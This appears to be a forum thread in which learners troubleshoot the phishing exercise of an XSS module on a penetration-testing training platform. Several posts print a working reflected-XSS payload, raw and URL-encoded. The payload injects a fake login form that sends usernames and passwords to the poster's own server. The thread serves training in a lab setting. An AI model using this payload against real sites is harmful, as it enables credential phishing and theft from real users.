Cross-Site Scripting (XSS) Module: "Issue in sending URL!" at the Phishing Section

[SPOILERS ALERT!] Hello! Newbie here trying to learn some pentest tools with the academy. First post :slight_smile:

I am stuck in the exercise of the Phishing section. I have managed to set up the PHP server and the payload that connects to the server. The resultant URL is

https://SERVER-IP/phishing/index.php?url='/><script>document.write('<h3>Please login to continue</h3><form action=http://MY-IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--

with SERVER-IP being the HTB machine’s, and MY-IP being my tun0 IP. When I open the link and fill the forms and press enter, my PHP server successfully receives the login details and everything behaves as expected.

The problem is that when I go to https://SERVER-IP/phishing/send.php, paste the mentioned link and press “Send”, the page shows “Issue in sending URL!” and nothing reaches my PHP server.

I have tried URL encoding, with the same result.

Is there something obvious I am missing?

Thanks a lot for any help! :slight_smile:

Try PHP server with 443.

Thanks for the help! It wasn’t the port, but found the solution anyway. Had to encode the URL, and send HTTP (not https).

I ran into the same issue, but mine had a different cause/solution.

For anyone in the future that gets the “Issue in sending URL!”, double check to make sure the payload you send is exactly what the material provides. Seems a little obvious in hindsight, but I wasted a good bit of time over a “lab-ism” that wouldn’t have mattered in a “real-world” instance; hopefully I can save someone else some trouble. :slight_smile:

thanks so much, explanation was helpful, the encoding got me as well.

Has anyone done the skills assessment for that same module? If you have please dm me I can use some help. Also to the question on top try resetting the target IP. That’s the only thing I can think of.

for me this server was quite unstable and I needed to restart it very often.

Do not forget to test if your local server is accessible from the server (local firewall settings).

I tested the URL and it worked; my problem is setting up the server. I can’t connect to 0.0.0.0:80 because it’s already listening. I tried 8080, 8000, and 81; none of them gets a response. Did everyone use the 0.0.0.0:80 for the address?

[quote="QuickFix914, post:9, topic:249212"]
Did everyone use the 0.0.0.0:80 for the address?[/quote]

I’m a dunce I got it. Going to my corner.

My script worked, and like everyone here, I’ve stumbled upon the “Issue in sending URL!” error.
This is what I’ve tried:

  1. Using ZAP browser.
  2. Installing and using Chrome browser.
  3. Using the payload of xlandrexl1 as CyberSecN00b said, as I’ve created a different script than the original.
  4. Encoding both payloads in 6 websites in case the issue was the server didn’t like the format.
  5. As my PHP server used port 8080 (couldn’t close 80, already in use by HTB’s pwnbox), I tried both payloads with :8080 removed from the URL in case the website didn’t like it, although it made no sense.
  6. Finally, and this was the solution, I’ve noticed that the website might not like the encoding of the URL in only some parts (the ones related to the ‘useful’ URL) so it didn’t realize it was a valid URL. So using the payload from xlandrexl1 as an example, it ended up like this:
    http://target.ip/phishing/index.php?url= http:/my.php.server.ip:8080

Hope this helps someone out there!

I’m sorry, it doesn’t allow me to put the correct sentence. What I meant was, you have to encode only the query parameters from the URL, so you would have:
http://target.ip/phishing/index.php?url= ENCODED URL PART http://my.php.server.ip:8080 ENCODED URL PART

This scenario is really starting to bother me, and surely there is a better way HTB could check for correct solutions. Like most people above I have a working solution that is as far as I can tell EXACTLY what the material provided.

http://TARGET IP/phishing/index.php?url='/%3E%3Cscript%3Edocument.write('%3Ch3%3EPlease%20login%20to%20continue%3C/h3%3E%3Cform%20action=http://MY IP:88%3E%3Cinput%20type=%22username%22%20name=%22username%22%20placeholder=%22Username%22%3E%3Cinput%20type=%22password%22%20name=%22password%22%20placeholder=%22Password%22%3E%3Cinput%20type=%22submit%22%20name=%22submit%22%20value=%22Login%22%3E%3C/form%3E');document.getElementById('urlform').remove();%3C/script%3E%3C!--

Naturally, port 80 is in use so the php server is running on port 88, other than that I can’t see any difference. I’ve tried encoding in different ways, using different ports, using Burp to send the link in more specific ways like wrapping the address in HTML hyperlink tags.

Could someone please just post a working link so I can understand the awful specific formatting?

UPDATE: My solution is correct, it now inexplicably works, HTB is just garbage.

Thnx, that helped a lot. I’m really soldiering through and get most of it myself and don’t mind spending hours/days searching for answers but having a working scenario/link and having it rated incorrect because of encoding issues of parts of the URL is really too much imo of what can be expected. Thanks a heap :).

It’s still not working for me even after encoding the url. My url looks like this:


http://10.129.164.70/phishing/index.php?url='/%3E%3Cscript%3Edocument.write('%3Ch3%3EPlease%20login%20to%20continue%3C/h3%3E%3Cform%20action=http://10.0.2.15:88%3E%3Cinput%20type=%22username%22%20name=%22username%22%20placeholder=%22Username%22%3E%3Cinput%20type=%22password%22%20name=%22password%22%20placeholder=%22Password%22%3E%3Cinput%20type=%22submit%22%20name=%22submit%22%20value=%22Login%22%3E%3C/form%3E');document.getElementById('urlform).remove();%3C/script%3E%3C!--

I still get the ‘Issue in sending URL!’ error. Been at this for a few days. Any help would be appreciated!

It’s just shitty but in my case you mustn’t encode all, just parts. The way it is written (and the way you executed it) is according to the wording I guess. But @Patoman19 also mentions that you ONLY have to encode the query parts and that meant for me starting encoding later in the link http://…snippet…=‘>document.write(’ ENCODED URL PART etc. Hope this helps.

so should my code be like this

document.write(‘

Please login to continue

<!–’);
this is where I’m stuck

I still can’t get it right. I’ve tried all sorts of encoding. I’m about done. This is ridiculous.

Can you help me? I’ve tried your suggestion and still get the same error.

Never mind, I solved the issue (sort of). Seems to be some sort of issue with the connection between my machine and HTB servers. When I jumped on their Pwnbox I submitted the exact same url and it worked. Have no idea what the problem is with the connection. This is the first time this issue has popped up. Haven’t had to use the pwnbox before (it’s so slow, I hate it so much).

Is anyone else having issues with their servers going down regularly? You submit a form and it tells you that the connection timed out? Happens to me every 30 seconds or so.

can you help me figure out what you did please? are you on discord?